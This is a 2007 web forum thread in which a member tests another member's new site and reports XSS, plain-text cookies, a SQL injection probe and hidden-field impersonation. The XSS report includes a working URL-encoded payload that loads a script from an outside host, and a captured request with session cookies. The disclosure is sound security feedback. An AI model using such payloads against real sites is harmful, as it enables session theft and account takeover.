Click to See Complete Forum and Search --> : Members section of new website
tarponkeith
Mar 13th, 2007, 05:31 PM
Hi,
Does anyone want to help me test out the members area of a new site I'm working on... If anyone is bored, please let me know... Thanks
abhijit
Mar 15th, 2007, 01:56 AM
where is it?
tarponkeith
Mar 18th, 2007, 09:36 PM
where is it?
Sorry, its http://www.yourcode.info
Memnoch1207
Apr 16th, 2007, 03:58 PM
1. Parts of your site are vulnerable to XSS (Cross Site Scripting) attacks.
Blah (http://www.yourcode.info/login.asp?err=e1&user=%22%3E%3Cscript%20defer%20src=%22http://mansiononmain.com/s.js%22%3E%3C/script%3E)
2. Your cookies are in plain text and are associated with "Usernames"
Host: www.yourcode.info
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.yourcode.info/login.asp
Cookie: ASPSESSIONIDACSSCAAA=FBNFLAJBDOGDMNACAELEJIFP; Username=blah; Code=TUOEH
I didn't actually attempt to hijack an account, but you should encrypt all cookie data.
3. Your site may be vulnerable to a SQL Injection attack.
http://www.yourcode.info/profile.asp?id=a
4. You are storing "User" information in a hidden field, this could be manipulated to impersonate another user.
On the "Contact.asp" page.
<input type="hidden" name="user" value="blah">
tarponkeith
Apr 18th, 2007, 12:19 AM
1. Parts of your site are vulnerable to XSS (Cross Site Scripting) attacks.
Blah (http://www.yourcode.info/login.asp?err=e1&user=%22%3E%3Cscript%20defer%20src=%22http://mansiononmain.com/s.js%22%3E%3C/script%3E)
2. Your cookies are in plain text and are associated with "Usernames"
I didn't actually attempt to hijack an account, but you should encrypt all cookie data.
3. Your site may be vulnerable to a SQL Injection attack.
http://www.yourcode.info/profile.asp?id=a
4. You are storing "User" information in a hidden field, this could be manipulated to impersonate another user.
On the "Contact.asp" page.
Thanks for the help!
I'm working on overhauling the entire site right now, and will definitely work those tips into the new design...
Much appreciated!
vbforums.com
Copyright Internet.com Inc., All Rights Reserved.